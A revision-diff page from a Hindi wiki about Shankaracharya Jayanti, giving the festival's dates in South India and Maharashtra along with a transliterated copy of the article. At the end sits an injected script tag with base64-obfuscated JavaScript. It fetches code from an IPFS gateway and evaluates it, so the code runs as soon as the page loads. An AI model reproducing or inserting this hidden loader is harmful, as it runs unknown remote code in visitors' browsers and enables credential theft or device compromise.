Difference between revisions of "शंकराचार्य जयन्ती"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "{{लेख प्रगति |आधार= |प्रारम्भि�)
 
Line 1: Line 1:
 +
[[चित्र:Adi-Shankaracharya.jpg|thumb|[[आदि शंकराचार्य]]]]
 +
'''शंकराचार्य जयन्ती''' का व्रत [[दक्षिण भारत]] में [[चैत्र]] [[शुक्ल पक्ष]] की [[पंचमी]] पर किया जाता है।
 +
* एक मतानुसार [[महाराष्ट्र]] में [[वैशाख]] शुक्ल पक्ष की [[दशमी]] पर भी शंकराचार्य जयन्ती मनाई जाती है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*दक्षिण [[भारत]] में [[चैत्र]] [[शुक्ल पक्ष]] की [[पंचमी]] पर शंकराचार्यजयन्ती व्रत किया जाता है। किन्तु [[महाराष्ट्र]] में [[वैशाख]] शुक्ल पक्ष की [[दशमी]] पर किया जाता है।
+
 
{{प्रचार}}
+
{{Main|आदि शंकराचार्य}}
 +
 
 +
 
 
{{लेख प्रगति |आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति |आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{पर्व और त्योहार}}
+
{{पर्व और त्योहार}}{{व्रत और उत्सव}}
{{व्रत और उत्सव}}
+
[[Category:व्रत और उत्सव]][[Category:हिन्दू धर्म कोश]][[Category:धर्म कोश]]
 
 
[[Category:व्रत और उत्सव]]
 
 
[[Category:संस्कृति कोश]]  
 
[[Category:संस्कृति कोश]]  
 
[[Category:पर्व और त्योहार]]
 
[[Category:पर्व और त्योहार]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:57, 6 April 2015

[[chitr:Adi-Shankaracharya.jpg|thumb|adi shankarachary]] shankarachary jayanti ka vrat dakshin bharat mean chaitr shukl paksh ki panchami par kiya jata hai.

  • ek matanusar maharashtr mean vaishakh shukl paksh ki dashami par bhi shankarachary jayanti manaee jati hai.
  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  1. REDIRECTsaancha:mukhy


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>